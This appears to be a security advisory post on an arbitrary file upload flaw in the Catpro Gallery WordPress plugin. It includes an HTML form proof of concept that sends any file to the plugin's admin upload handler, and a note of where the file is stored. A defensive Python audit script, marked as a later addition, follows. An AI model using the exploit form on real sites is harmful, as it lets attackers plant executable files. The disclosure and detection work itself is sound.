07 Jun

Arbitrary File Upload Vulnerability in Catpro Gallery

The Catpro Gallery plugin has an arbitrary file upload vulnerability (as well as a persistent cross-site scripting (XSS) vulnerability and possibly other security issues) as of version 3.8. The details of the underlying issue that causes this can be found in our post on a vulnerability in the Vertical Slideshow plugin, which shares the same vulnerable code.

Proof of Concept

The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories, the uploaded file will be located in the directory /wp-content/uploads/catpro/1_uploadfolder/big/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=catpro_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="cpr_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
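The two checks a category image upload handler should apply (an extension allowlist and a magic-byte check on the file content) can also be run after the fact over an existing site's upload directory, which is the practical question for anyone who had version 3.8 installed. The script below is an added example, not code from the original post or from the Catpro Gallery plugin; the allowlist, the file names and the file contents are constructed for the example, and only the directory layout /wp-content/uploads/catpro/1_uploadfolder/big/ is taken from the post.

```python
"""Audit a gallery upload directory for files that are not genuine images.

Added example (not code from the original post or the plugin): the
allowlist, sample file names and file contents are assumptions; the
directory layout catpro/1_uploadfolder/big/ is the one named in the post.
"""
import os
import tempfile
from pathlib import Path
from typing import Dict, Optional

# Extensions a gallery "category image" upload should be limited to (assumption).
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes ("magic numbers") for each allowed image type.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def classify(path: Path) -> Optional[str]:
    """Return a finding for a suspicious file, or None if it looks like a real image.

    Two independent checks, the same ones a server-side upload handler should apply:
    1. the last extension must be in the allowlist, so a script with a .php
       extension (including double extensions ending in .php) is caught;
    2. the content must start with the magic bytes of the claimed type, so a
       script merely renamed to .jpg is caught too.
    """
    ext = path.suffix.lower()
    if ext not in ALLOWED_EXT:
        return f"disallowed extension {ext!r}"
    with path.open("rb") as fh:
        head = fh.read(8)
    if not any(head.startswith(m) for m in MAGIC[ext]):
        return f"content does not match {ext!r} magic bytes"
    return None


def audit_upload_dir(root: Path) -> Dict[str, str]:
    """Walk the upload tree; map each suspicious file's relative path to its finding."""
    findings: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            finding = classify(p)
            if finding:
                findings[p.relative_to(root).as_posix()] = finding
    return findings


def build_sample_tree() -> Path:
    """Create a constructed sample tree mirroring the plugin's upload layout."""
    root = Path(tempfile.mkdtemp()) / "catpro"
    big = root / "1_uploadfolder" / "big"
    big.mkdir(parents=True)
    (big / "cover.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)  # legitimate image
    (big / "cover.gif").write_bytes(b"GIF89a" + b"\x00" * 16)             # legitimate image
    (big / "script.php").write_bytes(b"<?php echo 'constructed'; ?>")     # disallowed extension
    (big / "renamed.jpg").write_bytes(b"<?php echo 'constructed'; ?>")    # script renamed to .jpg
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel_path, finding in sorted(audit_upload_dir(sample_root).items()):
        print(f"{rel_path}: {finding}")
```

On a real site, point audit_upload_dir at the wp-content/uploads/catpro directory instead of the constructed tree; any file it reports is either a script that the upload handler should never have accepted or a file whose extension and content disagree, and both deserve a look.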

Timeline

  • 6/7/2016 – WordPress.org Plugin Directory notified.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for half off for the first year when you sign up now.
